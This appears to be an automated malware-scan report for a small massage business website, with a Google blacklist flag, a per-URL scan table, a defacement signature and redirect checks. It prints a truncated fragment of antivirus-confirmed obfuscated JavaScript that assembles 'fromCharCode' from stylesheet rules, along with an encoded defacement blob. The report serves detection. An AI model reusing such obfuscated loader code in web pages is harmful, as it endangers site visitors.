Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=renaissancemassageandwellness.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://renaissancemassageandwellness.com/ | 200 OK Content-Length: 1343 Content-Type: text/html | clean |
http://renaissancemassageandwellness.com/404.shtml | 200 OK Content-Length: 234 Content-Type: text/html | clean |
http://renaissancemassageandwellness.com/test404page.js | 404 Not Found Content-Length: 236 Content-Type: text/html | clean |
http://renaissancemassageandwellness.com/attachments/ | 200 OK Content-Length: 12500 Content-Type: text/html | suspicious |
Deface/Content modification. The following signature was found: for previously hacked file that contained string HackeD By TiGER-M@TE -- <!-- Placeholder file for previously hacked file that contained string HackeD By TiGER-M@TE --> <!---EPRC1UBSrHyZHa762rTIb7pChwHeIAuWFKEgPr9H9J4qlREecDT7AmmovWHSR9WtsYqfEbAprst2y8Lks8yRPegAektYOaQlWVtXxzbdn85RxTDMQ9fltDFygYqYlk7f8EF9BCWCD0HIOyaIpYXJU1Rzf3EHb07W1LYN3vzJ2gyMS4R4KG4ciOrnD4kmgPq4BTcRA8E6svVvMaOOotJLojGazjGVuGiVrS2wHg2rSjoxu6RILcM7XazE8TRqfioMMC94bmHwM6w3yFsFfyaSn2sQ6CVdzj3vj7caPaBypWlv5s1bsLLIU6DCamNqbJEV8c3Hgx8gHki9ncNZmZN0ErxQExCA2xlDMNlNr6qKz0R8Sjt3FxDPIZEE6srZ49vA8IC4L ...[12017 bytes skipped]... | ||
http://renaissancemassageandwellness.com/cgi-bin/ | 403 Forbidden Content-Length: 228 Content-Type: text/html | clean |
http://renaissancemassageandwellness.com/config.php | 200 OK Content-Length: 0 Content-Type: text/html | clean |
http://renaissancemassageandwellness.com/cruanemassage.com/ | 200 OK Content-Length: 324 Content-Type: text/html | clean |
http://renaissancemassageandwellness.com/cruanemassage.com/.ftpquota | 403 Forbidden Content-Length: 228 Content-Type: text/html | clean |
http://renaissancemassageandwellness.com/cruanemassage.com/cgi-bin/ | 200 OK Content-Length: 272 Content-Type: text/html | clean |
http://renaissancemassageandwellness.com/css/ | 200 OK Content-Length: 12500 Content-Type: text/html | clean |
http://renaissancemassageandwellness.com/data/ | 200 OK Content-Length: 12500 Content-Type: text/html | clean |
http://renaissancemassageandwellness.com/images/ | 200 OK Content-Length: 12500 Content-Type: text/html | clean |
http://renaissancemassageandwellness.com/include/ | 200 OK Content-Length: 12500 Content-Type: text/html | clean |
http://renaissancemassageandwellness.com/init.php | 200 OK Content-Length: 0 Content-Type: text/html | clean |
http://renaissancemassageandwellness.com/juliofroberg.com/ | 200 OK Content-Length: 8650 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var WnmaQ={YYSXc:function(){l='';var v=function(){};function nB(){};var g = new Date(2011, 10, 12, 10, 42, 57);this.mS="mS";var s=false;this.zN=false;var u="";var o = g.getMonth();var r = "from" + g.getMonth() + "e";function t(){};d='';r = r.replace(10, "CharCod");a="";this.bX=''; var z=null;var aY=false;var f=function(){};var i=document.styleSheets;zA="";var x=false;for(var gP=0;gP < i.length;gP++){this.tT=false;var fU="fU";this.nT=62782;var jC='';var b=i[gP].cssRules||i[gP].rules;aV="";var Antivirus reports:
|
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: renaissancemassageandwellness.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 26 Dec 2014 18:17:22 GMT
Server: Apache
Content-Length: 1343
Content-Type: text/html;charset=ISO-8859-1
...1343 bytes of data.
GET / HTTP/1.1
Host: renaissancemassageandwellness.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 26 Dec 2014 18:17:22 GMT
Server: Apache
Content-Length: 1343
Content-Type: text/html;charset=ISO-8859-1
...1343 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: renaissancemassageandwellness.com
Referer: http://www.google.com/search?q=renaissancemassageandwellness.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: renaissancemassageandwellness.com
Referer: http://www.google.com/search?q=renaissancemassageandwellness.com
Result:
The result is similar to the first query. There are no suspicious redirects found.